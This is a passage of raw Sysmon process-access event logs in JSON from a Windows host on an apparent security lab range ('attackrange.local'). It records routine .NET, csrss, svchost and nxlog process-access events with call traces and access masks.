07:03:21.123","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1393-5F25-0000-001080251000}","TargetProcessId":"4712","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9038,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:21.123\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1393-5F25-0000-001080251000}\r\nTargetProcessId: 4712\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:21.123","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1393-5F25-0000-001080251000}","TargetProcessId":"4712","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9039,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:21.138\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13B9-5F25-0000-001042721100}\r\nTargetProcessId: 4712\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:21.138","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13B9-5F25-0000-001042721100}","TargetProcessId":"4712","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9040,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:21.529\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1381-5F25-0000-001013C90F00}\r\nTargetProcessId: 4428\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:21.529","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1381-5F25-0000-001013C90F00}","TargetProcessId":"4428","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9041,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:21.529\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1381-5F25-0000-001013C90F00}\r\nTargetProcessId: 4428\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:21.529","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1381-5F25-0000-001013C90F00}","TargetProcessId":"4428","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9042,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:21.529\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1381-5F25-0000-001013C90F00}\r\nTargetProcessId: 4428\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:21.529","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1381-5F25-0000-001013C90F00}","TargetProcessId":"4428","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9043,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:21.873\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:21.873","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9044,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:22.888\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:22.888","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9045,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:23.904\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: 